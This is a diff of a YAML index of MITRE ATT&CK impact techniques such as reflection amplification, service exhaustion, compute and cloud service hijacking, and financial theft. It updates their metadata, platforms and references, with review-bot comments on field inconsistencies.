- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -56979,39 +57738,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
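Review bot: the `identifier: T1489` key survives as an unchanged context line, yet no other technique record in this diff carries an `identifier` key apart from T1491.001 further down; either every record should have it or none, otherwise consumers cannot rely on it. Also, T1499.004 loses the platforms Azure AD, Office 365, SaaS and Google Workspace here, with Windows/IaaS/Linux/macOS re-added in the next hunk, matching the platform narrowing applied to T1498.002 and T1499.002 further down; fine as long as that narrowing is intentional upstream data and not a generator mapping gap.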
@@ -57029,13 +57786,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57043,36 +57807,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
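Review bot: the removed T1565.003 references had an inconsistent key order (`description` before `url` before `source_name` for the FireEye entry), and the replacement uses source_name/description/url throughout, which is good. However, this hunk again interleaves the tail of T1499.004 with the head of T1565.003 (`atomic_tests: []` and `T1565.003:` are both removed and re-added), so the net content change for T1565.003 here is only `modified` and the reference order. A stable generator ordering would reduce this to a few-line change.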
@@ -57081,11 +57836,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57094,17 +57855,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
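Review bot: `x_mitre_permissions_required` (User, Administrator, root, SYSTEM) is removed from T1565.003 with nothing replacing it; any index or filter that consumes that field now silently gets nothing for this technique. Please confirm the field is absent from the upstream object rather than dropped by the generator, and mention the removal in the PR description.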
@@ -57113,6 +57888,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -57128,17 +57904,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
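Review bot: T1498.002 drops Azure AD, Office 365, SaaS and Google Workspace from `x_mitre_platforms` with the version bump 1.3 → 1.4; the same removal is applied to T1499.002 below (also 1.3 → 1.4) and to T1499.003 and T1499.004 above. Any per-platform index built from these entries will no longer list these DoS techniques under the removed platforms, which is the expected effect of the change but should be called out explicitly in the PR description.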
@@ -57148,14 +57919,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
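Review bot: the `Cloudflare ReflectionDoS May 2017` entry removed here is re-added unchanged further down the same `external_references` list, and the `Cisco DoSdetectNetflow` entry added here is removed from the end of the list in the next hunk (likewise `Cloudflare Memcrashed Feb 2018` moves); the reference set for T1498.002 is unchanged, only its order. Reviewers can verify by comparing the `source_name` values before and after rather than reading the moved blocks line by line.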
@@ -57164,28 +57936,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
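Review bot: `x_mitre_attack_spec_version` for T1498.002 goes 3.1.0 → 3.2.0, `spec_version: '2.1'` is removed, and `x_mitre_modified_by_ref` is re-added at the end of the record, which makes it consistent with the other 3.2.0 entries in this diff. The T1499.002 `modified` on the following lines moves from 2023-05-09T14:00:00.188Z to 2024-10-15T16:05:48.014Z, another of the batch-stamped values being replaced by a per-object timestamp.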
@@ -57196,7 +57968,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57207,17 +57978,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57254,7 +58020,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -57275,7 +58042,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
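Review bot: T1491's `modified` goes backwards from 2022-05-11T14:00:00.188Z to 2022-03-25T19:34:42.056Z, and unlike the other records in this diff the surrounding T1491 fields keep the old key order (`external_id` before `url` in the mitre-attack reference). Together with the next hunk, which removes T1491's `x_mitre_attack_spec_version: 2.1.0` without adding a 3.2.0 value, this suggests T1491 was sourced from a different, older object than the rest; please confirm that is intended.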
@@ -57302,12 +58069,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
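Review bot: T1491 leaves this hunk with no `x_mitre_attack_spec_version` at all (2.1.0 removed, nothing added), while every other record here either carries 3.2.0 or keeps 2.1.0; either restore the value from the source object or document that the key is optional. The new T1496.002 (Bandwidth Hijacking) record's four references match the citation markers in its description, but `x_mitre_detection: ''` is an empty string rather than an omitted key; consumers should treat the two identically, and the new T1496.004 record below follows the same convention, so it is worth stating once in the generator which form is canonical. The `GoBotKR` description also contains what appears to be a non-ASCII hyphen in `backdoor‑laced`, copied from the source title; harmless in YAML but it will trip any ASCII-only check on the index.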
@@ -57340,7 +58173,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -57350,10 +58183,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
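Review bot: T1657's platforms replace Office 365 and Google Workspace with the single value Office Suite (version 1.1 → 1.2). Any per-platform index keyed on the old platform names will silently drop T1657 unless the platform-to-index mapping is updated to include Office Suite; please confirm the index generator knows the new name before this merges.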
@@ -57416,7 +58248,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -57457,7 +58288,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -57478,9 +58309,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
